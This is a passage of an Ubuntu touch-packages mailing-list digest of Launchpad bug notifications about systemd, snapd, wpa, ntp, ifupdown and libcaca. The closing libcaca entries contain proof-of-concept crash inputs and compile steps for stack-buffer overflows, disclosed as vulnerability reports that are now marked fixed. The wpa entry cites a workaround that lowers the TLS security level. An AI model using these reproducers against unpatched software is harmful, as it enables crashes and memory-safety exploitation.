apparmor. [scope] this is needed for b/f/g. this is also needed for e, but that is EOL in weeks and this is not important enough to bother there. [original description] Fresh install of Ubuntu 18.04. lxd installed from snap. Fresh 18.04 container. Everything up todate via apt. Install quassel-core. Service will not start. Set "aa-complain /usr/bin/quasselcore" allows quasselcore to start. I then added "/usr/bin/quasselcore rm," to "/etc/apparmor.d/usr.bin.quasselcore". Set "aa-enforce /usr/bin/quasselcore". Restarted main host. Quasselcore service now starts and I can connect to it. To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1814302/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978476] [NEW] Incorrect UNTIL recurrence with midnight start
Public bug reported: EDS generates instances for recurring events starting at midnight with an UNTIL date incorrectly. Specifically, using e_cal_client_generate_instances() or e_cal_recur_generate_instances_sync() generates an instance one day after the UNTIL date. This bug was introduced with the migration to libical-glib and libecal-2.0, so this affects bot focal and jammy. It was fixed with commit 3969303e (master) and 7fb64814 (gnome-42) which will be part of the 3.45.1+ and 3.44.3+ releases respectively. Upstream bug report: https://gitlab.gnome.org/GNOME/evolution-data- server/-/issues/393 ** Affects: evolution-data-server (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to evolution-data-server in Ubuntu. https://bugs.launchpad.net/bugs/1978476 Title: Incorrect UNTIL recurrence with midnight start Status in evolution-data-server package in Ubuntu: New Bug description: EDS generates instances for recurring events starting at midnight with an UNTIL date incorrectly. Specifically, using e_cal_client_generate_instances() or e_cal_recur_generate_instances_sync() generates an instance one day after the UNTIL date. This bug was introduced with the migration to libical-glib and libecal-2.0, so this affects bot focal and jammy. It was fixed with commit 3969303e (master) and 7fb64814 (gnome-42) which will be part of the 3.45.1+ and 3.44.3+ releases respectively. Upstream bug report: https://gitlab.gnome.org/GNOME/evolution-data- server/-/issues/393 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1978476/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1977652] Re: systemd loops trying to start systemd-ask-password-plymouth
I think I misunderstood the first time I looked at the upstream issue. We have the commit that reverts the regressing commit, but not the follow-on patch (which was not backported to the v259-stable branch). -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1977652 Title: systemd loops trying to start systemd-ask-password-plymouth Status in systemd package in Ubuntu: Incomplete Bug description: Short story: - after boot - when a systemd service wants a password - systemd-ask-password is invoked - systemd-ask-password-plymouth.path is reached - systemd-ask-password-plymouth.service is started Except: - the conditions for the latter are (apparently) not met End result: - 40.000x "Condition check resulted in Forward Password Requests to Plymouth being skipped." - 1.5 minutes of 100% cpu usage AFFECTED VERSION systemd 249.11-0ubuntu3.1 on Ubuntu/Jammy 22.04 HOW TO REPRODUCE If I leave the `systemd-ask-password-plymouth.path` unmasked/enabled and reboot. OpenVPN (calling systemd-ask-password) will trigger the condition. This causes high CPU usage for 1.5 minutes. It looks like /run/plymouth/pid exists (for the .path file) at first, when that is invoked, but then the resultant target (the .service file) checks again, and finds that it is gone. Manually reproducing: # ls /run/systemd/ask-password ask.5hW6rb sck.79cfe1203518610 # mkdir /run/plymouth/pid # systemctl start systemd-ask-password-plymouth.service systemd-ask-password-plymouth.path # systemctl show --value --property=MainPID systemd-ask-password-plymouth.service 24777 # rmdir /run/plymouth/pid ; kill 24777 Result: systemd going into a loop. Stop the loop with: # systemctl stop systemd-ask-password-plymouth.path ANALYSIS It looks like this: https://github.com/systemd/systemd/issues/21025 which is fixed by: https://github.com/systemd/systemd/pull/21030 Alternative bug reports: https://bugzilla.redhat.com/show_bug.cgi?id=1919538 Systemd's own analysis of the situation: # systemd-analyze critical-chain systemd-ask-password-plymouth.service ... systemd-ask-password-plymouth.service @1min 35.823s └─systemd-ask-password-plymouth.path @593ms └─plymouth-start.service @571ms +21ms └─systemd-udevd.service @450ms +119ms └─systemd-tmpfiles-setup-dev.service @429ms +18ms └─systemd-sysusers.service @382ms +46ms └─systemd-remount-fs.service @353ms +22ms └─systemd-journald.socket @318ms └─system.slice @264ms └─-.slice @264ms --- WORKAROUNDS --- This works as long as you don't need the plymouth-ask-password: # systemctl disable systemd-ask-password-plymouth.path # systemctl mask systemd-ask-password-plymouth.path Could you get the relevant patches from upstream sorted in Jammy? Thanks! Walter Doekes OSSO B.V. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1977652/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1972159] Re: systemd-oomd frequently kills firefox and visual studio code
** Bug watch added: Red Hat Bugzilla #1941170 https://bugzilla.redhat.com/show_bug.cgi?id=1941170 ** Also affects: systemd (Fedora) via https://bugzilla.redhat.com/show_bug.cgi?id=1941170 Importance: Unknown Status: Unknown -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1972159 Title: systemd-oomd frequently kills firefox and visual studio code Status in systemd package in Ubuntu: Incomplete Status in systemd package in Fedora: Unknown Bug description: Since I installed Ubuntu 22.04, firefox and visual studio code are frequently killed by systemd-oomd (every 2hours). I have 8 GB memory and never experienced this before the upgrade to Ubuntu 22.04. I thus assume that the claim that there is not enough memory is abusive. Did 64GB of memory become the minimum requirement to run Ubuntu ? The second problem is that it gives a very bad user experience which is critical for new Ubuntu users. There should be a warning prior killing apps to give the opportunity to save the app data. There should at least be an apologize and an explanation after killing the app. The current behavior gives the impression that Ubuntu 22.04 is unreliable and unsafe to use which is a problem for an LTS release that many people might want to use for critical production context. There might be a configuration problem with systemd-oomd or simply a bogus behavior. I would recommend to disable it or remove it completely until this problem is resolved. This is what I will do for myself because I have work to do. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1972159/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1951491] Re: Can't run snaps: .slice/session-1.scope is not a snap cgroup
Please note that nomachine technical support provided me with a workaround. It works, but I don't understand the implications. This fixed the problem with xubuntu 22.04. The support notes says it works for ubuntu 22. 04 as well In my case I added the kernel setting to GRUB_CMDLINE_LINUX which was present in my /etc/default/grub "*1.* sudo vim /etc/default/grub change from: GRUB_CMDLINE_LINUX_DEFAULT="quiet splash" to: GRUB_CMDLINE_LINUX_DEFAULT="quiet splash systemd.unified_cgroup_hierarchy=0" *2. *sudo update-grub *3.* sudo reboot" -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1951491 Title: Can't run snaps: .slice/session-1.scope is not a snap cgroup Status in snapd package in Ubuntu: Invalid Status in systemd package in Ubuntu: Confirmed Status in snapd package in Debian: New Bug description: I just upgraded from hirsute to impish using do-release-upgrade. On the upgraded system, I can't run either firefox or chromium (both of which worked fine under hirsute). Both fail with: /user.slice/user-NNN.slice/session-1.scope is not a snap cgroup where NNN is my uid With firefox, I was able to fix the problem with: snap remove --purge firefox apt purge firefox apt install firefox Now firefox works. But I tried the same thing substituting chromium- browser for firefox, and it didn't help: chromium fails with the same error message. I guess there must be something left over from the hirsute version of snapd that isn't getting noticed or cleared by the impish version? Someone suggested this might be related to bug 1850667, but that bug is marked fixed as of a couple months ago, and I just did this upgrade today. Also, it doesn't mention the error message I'm seeing. ProblemType: Bug DistroRelease: Ubuntu 21.10 Package: snapd 2.53+21.10ubuntu1 ProcVersionSignature: Ubuntu 5.13.0-21.21-generic 5.13.18 Uname: Linux 5.13.0-21-generic x86_64 ApportVersion: 2.20.11-0ubuntu71 Architecture: amd64 CasperMD5CheckResult: unknown Date: Thu Nov 18 18:12:45 2021 InstallationDate: Installed on 2020-04-29 (568 days ago) InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423) SourcePackage: snapd UpgradeStatus: Upgraded to impish on 2021-11-18 (0 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1951491/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978351] Re: MITM vector: ifupdown puts .domains TLD in resolv.conf
Debian 11's ifupdown 0.8.36 does not contain the /etc/network/if- up.d/resolved script that contains the DOMAINS=DOMAINS line. The equivalent functionality in Debian comes from /etc/network/if- up.d/000resolvconf from the resolvconf package. (I don't know if these are standard or if these are vendor customizations to the default package lists). -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ifupdown in Ubuntu. https://bugs.launchpad.net/bugs/1978351 Title: MITM vector: ifupdown puts .domains TLD in resolv.conf Status in ifupdown package in Ubuntu: New Bug description: The bug described in https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1907878?comments=all is a security vulnerability because DNS names that would normally fail are now attempted as "foo.domains". ".domains" is a real TLD, with the registrar "Donuts, Inc." based in Bellvue, WA. "google.com.domains" is registered, for example. So is "test.domains". For users with ifupdown, any Internet request (especially that does not involve some cryptographic payload and destination signature verification) is potentially sending packets to an unintended audience. It's impossible to say, but likely, that malicious registrants are squatting sensitive and common names in the .domains TLD. The ifupdown package is still used by some cloud providers that have not adopted netplan. This vulnerability affects 22.04 and potentially other releases. This issue has not been corrected in 0.8.36+nmu1ubuntu4. With 0.8.36+nmu1ubuntu3 and after an update to 0.8.36+nmu1ubuntu4, the resolv.conf looks like the following (which is vulnerable to mitm attacks): ``` root@foo:~# cat /etc/resolv.conf # This is /run/systemd/resolve/stub-resolv.conf managed by man:systemd-resolved(8). # Do not edit. # # This file might be symlinked as /etc/resolv.conf. If you're looking at # /etc/resolv.conf and seeing this text, you have followed the symlink. # # This is a dynamic resolv.conf file for connecting local clients to the # internal DNS stub resolver of systemd-resolved. This file lists all # configured search domains. # # Run "resolvectl status" to see details about the uplink DNS servers # currently in use. # # Third party programs should typically not access this file directly, but only # through the symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a # different way, replace this symlink by a static file or a different symlink. # # See man:systemd-resolved.service(8) for details about the supported modes of # operation for /etc/resolv.conf. nameserver 127.0.0.53 options edns0 trust-ad search DOMAINS ``` To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1978351/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969375] Re: systemd-cryptenroll does not support TPM2 devices
I've tested systemd 249.11-0ubuntu3.3 from jammy-proposed, all looking good! $ apt list systemd Listing... Done systemd/jammy-proposed,now 249.11-0ubuntu3.3 amd64 [installed] # 1: only "libssl3" is added as a binary dependency (as expected) plus some new "Suggests": $ apt-cache depends systemd > new $ git diff --no-index old new diff --git a/old b/new index 3b38cbb..cd28c0c 100644 --- a/old +++ b/new @@ -21,6 +21,7 @@ systemd Depends: libmount1 Depends: libpam0g Depends: libseccomp2 + Depends: libssl3 Depends: libsystemd0 Depends: util-linux Depends: mount @@ -44,5 +45,9 @@ systemd openntpd systemd-timesyncd Suggests: systemd-container + Suggests: libfido2-1 + Suggests: libtss2-esys-3.0.2-0 + Suggests: libtss2-mu0 + Suggests: libtss2-rc0 Suggests: policykit-1 # 2: systemd-cryptenroll does not crash due to undefined symbols: $ systemd-cryptenroll --help systemd-cryptenroll [OPTIONS...] BLOCK-DEVICE Enroll a security token or authentication credential to a LUKS volume. -h --helpShow this help --version Show package version --passwordEnroll a user-supplied password --recovery-keyEnroll a recovery key --pkcs11-token-uri=URI Specify PKCS#11 security token URI --fido2-device=PATH Enroll a FIDO2-HMAC security token --fido2-with-client-pin=BOOL Whether to require entering a PIN to unlock the volume --fido2-with-user-presence=BOOL Whether to require user presence to unlock the volume --fido2-with-user-verification=BOOL Whether to require user verification to unlock the volume --tpm2-device=PATH Enroll a TPM2 device --tpm2-pcrs=PCR1+PCR2+PCR3+… Specify TPM2 PCRs to seal against --wipe-slot=SLOT1,SLOT2,… Wipe specified slots See the systemd-cryptenroll(1) man page for details. $ echo $? 0 # initial setup $ dd if=/dev/zero of=encrypted.img bs=1 count=0 seek=100M 0+0 Datensätze ein 0+0 Datensätze aus 0 Bytes kopiert, 0,000629802 s, 0,0 kB/s $ echo -n "s0s3cur3" | cryptsetup luksFormat encrypted.img - $ sudo /usr/lib/systemd/systemd-cryptsetup attach volume encrypted.img Please enter passphrase for disk volume: Set cipher aes, mode xts-plain64, key size 512 bits for device encrypted.img. $ sudo mkfs.ext4 /dev/mapper/volume mke2fs 1.46.5 (30-Dec-2021) Ein Dateisystem mit 21504 (4k) Blöcken und 21504 Inodes wird erzeugt. beim Anfordern von Speicher für die Gruppentabellen: erledigt Inode-Tabellen werden geschrieben: erledigt Das Journal (1024 Blöcke) wird angelegt: fertig Die Superblöcke und die Informationen über die Dateisystemnutzung werden geschrieben: erledigt $ sudo mount /dev/mapper/volume /mnt $ sudo touch /mnt/TPM_TEST $ ls -la /mnt insgesamt 24 drwxr-xr-x 3 root root 4096 Jun 13 10:56 . drwxr-xr-x 20 root root 4096 Apr 20 11:45 .. drwx-- 2 root root 16384 Jun 13 10:56 lost+found -rw-r--r-- 1 root root 0 Jun 13 10:56 TPM_TEST $ sudo umount /dev/mapper/volume $ sudo cryptsetup luksClose volume $ ls -la /mnt # empty insgesamt 8 drwxr-xr-x 2 root root 4096 Mai 7 2021 . drwxr-xr-x 20 root root 4096 Apr 20 11:45 .. #3 non-TPM use case: $ systemd-cryptenroll --password encrypted.img Please enter current passphrase for disk /home/lukas/canonical/systemd-dbg/encrypted.img: Please enter new passphrase for disk /home/lukas/canonical/systemd-dbg/encrypted.img: Please enter new passphrase for disk /home/lukas/canonical/systemd-dbg/encrypted.img (repeat): New password enrolled as key slot 1. $ sudo /usr/lib/systemd/systemd-cryptsetup attach volume encrypted.img Please enter passphrase for disk volume: Set cipher aes, mode xts-plain64, key size 512 bits for device encrypted.img. $ sudo cryptsetup luksClose volume $ systemd-cryptenroll --wipe-slot=1 encrypted.img Wiped slot 1. $ systemd-cryptenroll --recovery-key encrypted.img Please enter current passphrase for disk /home/lukas/canonical/systemd-dbg/encrypted.img: A secret recovery key has been generated for this volume: fcjbduir-fdvfukdd-cfkdbnbv-ecnlbtnv-ibugtrkb-rgntjrln-ejvljbdb- kilkiuti Please save this secret recovery key at a secure location. It may be used to regain access to the volume if the other configured access credentials have been lost or forgotten. The recovery key may be entered in place of a password whenever authentication is requested. New recovery key enrolled as key slot 1. $ sudo /usr/lib/systemd/systemd-cryptsetup attach volume encrypted.img Please enter passphrase for disk volume: *** Set cipher aes, mode xts-plain64, key size 512
[Touch-packages] [Bug 1958267] Re: wpa can't connect to servers using TLS 1.1 or older
-6ubuntu2 is the version that will get to Jammy (22.04), 9ubuntu1 is the version currently in the devel series (future Kinetic, 22.10). In general it is preferable to use the version compiled for your current series, even though using the one in -devel might make sense in a testing context, as was the case here. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to wpa in Ubuntu. https://bugs.launchpad.net/bugs/1958267 Title: wpa can't connect to servers using TLS 1.1 or older Status in wpa package in Ubuntu: Fix Released Status in wpa source package in Jammy: Fix Committed Status in wpa package in Debian: New Bug description: * Impact wpa built with in openssl3 fails to connect to TLS 1.1 or lower server * Test case try to connect to a TLS <= 1.1 access point * Regression potential the patch lowers the security level in some situation for compatibility, it shouldn't prevent connecting to newer hardware, still try to connect to different type of wifi with different security levels --- those uses MD5-SHA1 as digest in its signature algorithm which no longer meets OpenSSL default level of security of 80 bits http://lists.infradead.org/pipermail/hostap/2022-May/040563.html Workaround are described in #22 and #36 by basically using CipherString = DEFAULT@SECLEVEL=0 which lowers the security level --- With the current jammy version of wpasupplicant (2:2.10-1), I cannot connect to the WPA Enterprise network eduroam, which is used by Universities worldwide. I get a "Connection failed" message or a request to re-enter the password. - I've re-tried the credentials: no fix ;-) - Tried a 21.10 live session on the same machine: works fine! - Manually downgraded wpasupplicant to the impish version (2:2.9.0-21build1): connected normally. - Upgraded wpasupplicant to the latest version: fails to connect again. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: wpasupplicant 2:2.10-1 ProcVersionSignature: Ubuntu 5.15.0-17.17-generic 5.15.12 Uname: Linux 5.15.0-17-generic x86_64 NonfreeKernelModules: wl ApportVersion: 2.20.11-0ubuntu75 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Jan 18 09:56:23 2022 InstallationDate: Installed on 2021-11-30 (48 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20211130) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: wpa UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/wpa/+bug/1958267/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1964494] Re: Setting DuplicateAddressDetection=none doesn't disable DAD for link-local IPs
Tested 249.11-0ubuntu3.3 and DuplicateAddressDetection is now honored as expected. No other issues were observed. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1964494 Title: Setting DuplicateAddressDetection=none doesn't disable DAD for link- local IPs Status in systemd: Fix Released Status in systemd package in Ubuntu: Fix Released Status in systemd source package in Jammy: Fix Committed Status in systemd source package in Kinetic: Fix Released Bug description: [impact] manual disabling of ipv4 DAD (IACD) for static link-local address does not work in jammy [test case] see 'Reproducer' in original description below [regression potential] failure to disable DAD, or incorrect disabling of DAD, or networkd issues around parsing of DAD config parsing [scope] this is needed for j and k introduced upstream by commit 1cf4ed142d6c1e2b9dc6a0bc74b6a83ae30b0f8e, first included in v249, so this bug does not affect impish or earlier fixed upstream by commit 2859932bd64d61a89f85fa027762bc16961fcf53 [original description] A customer reported network disconnections on their storage servers when running 'netplan apply'. The culprit was that they have link-local addresses configured and the Duplicate Address Detection (DAD) mechanism was delaying the interfaces from coming back up. As a workaround we tried to disable DAD for the interfaces but that's not working in Ubuntu 22.04: I've noticed that setting DuplicateAddressDetection=none for an interface with a link-local address (e.g., 169.254.*) via a .network file added to /etc/systemd/network/ doesn't really disable Duplicate Address Detection. OS and package versions: - Description: Ubuntu Jammy Jellyfish (development branch). Release: 22.04 - systemd 249.5-2ubuntu4 Reproducer: --- 1- Set up Ubuntu 22.04 VM 2- Increase systemlog level: mkdir -p /etc/systemd/system/systemd-networkd.service.d/ cat > /etc/systemd/system/systemd-networkd.service.d/10-debug.conf
[Touch-packages] [Bug 1823098] Re: /etc/init.d/ntp prefers DHCP over configured /etc/ntp.conf
It's still an issue, can we get a fix please? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ntp in Ubuntu. https://bugs.launchpad.net/bugs/1823098 Title: /etc/init.d/ntp prefers DHCP over configured /etc/ntp.conf Status in cloud-images: New Status in ntp package in Ubuntu: New Status in ntp source package in Xenial: New Bug description: Hi, On a few instances in a public cloud, mostly seen in GCE, ntp seems incorrectly set up with: | ubuntu@juju-453c71-0:~$ ntpq -pn | remote refid st t when poll reach delay offset jitter | == | *169.254.169.254 71.79.79.71 2 u 737 1024 3770.6570.136 0.147 We have /etc/ntp.conf configured to use ntp.ubuntu.com as a 'pool' host. Turns out, it seems the /etc/init.d/ntp prefers the DHCP version over our configured ntp.conf: | if [ /var/lib/ntp/ntp.conf.dhcp -nt /etc/ntp.conf ]; then | NTPD_OPTS="$NTPD_OPTS -c /var/lib/ntp/ntp.conf.dhcp" | fi | ubuntu@juju-453c71-0:/etc$ ls -la /var/lib/ntp/ntp.conf.dhcp /etc/ntp.conf | -rw-r--r-- 1 root root 626 Feb 25 08:54 /etc/ntp.conf | -rw-r--r-- 1 root root 897 Mar 29 21:00 /var/lib/ntp/ntp.conf.dhcp I think this is wrong, if /etc/ntp.conf is configured, it should use that over what DHCP/dhclient provides. | ubuntu@juju-453c71-0:~$ cat /etc/*release | DISTRIB_RELEASE=16.04 | DISTRIB_DESCRIPTION="Ubuntu 16.04.6 LTS" | VERSION_ID="16.04" | ubuntu@juju-453c71-0:~$ dpkg-query -S /etc/init.d/ntp | ntp: /etc/init.d/ntp | ubuntu@juju-453c71-0:~$ apt-cache policy ntp | ntp: | Installed: 1:4.2.8p4+dfsg-3ubuntu5.9 | Candidate: 1:4.2.8p4+dfsg-3ubuntu5.9 | Version table: | *** 1:4.2.8p4+dfsg-3ubuntu5.9 500 | 500 http://us-central1.gce.archive.ubuntu.com/ubuntu xenial-updates/main amd64 Packages | 500 http://security.ubuntu.com/ubuntu xenial-security/main amd64 Packages Thanks, Haw To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-images/+bug/1823098/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
was solved in 0.99.beta20-1 ** Changed in: libcaca (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925468 Title: stack-buffer-overflow of import.c in function _import_bin Status in libcaca: Fix Released Status in libcaca package in Ubuntu: Fix Released Bug description: Hello ubuntu security team issues:https://github.com/cacalabs/libcaca/issues/56 System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"bin"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: = ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes around the buggy address: 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3817476==ABORTING Thanks To manage notifications about this bug go to:
[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi
was solved in 0.99.beta20-1 ** Changed in: libcaca (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925467 Title: stack-buffer-overflow of text.c in function _import_ansi Status in libcaca: Fix Released Status in libcaca package in Ubuntu: Fix Released Bug description: Hello ubuntu security team issues: https://github.com/cacalabs/libcaca/issues/55 System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_ansi.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"ansi"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_ansi.cc clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi 5.Run poc_ansi asan info: = ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8 READ of size 1 at 0x7ffda0164bea thread T0 #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d) Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi Shadow bytes around the buggy address: 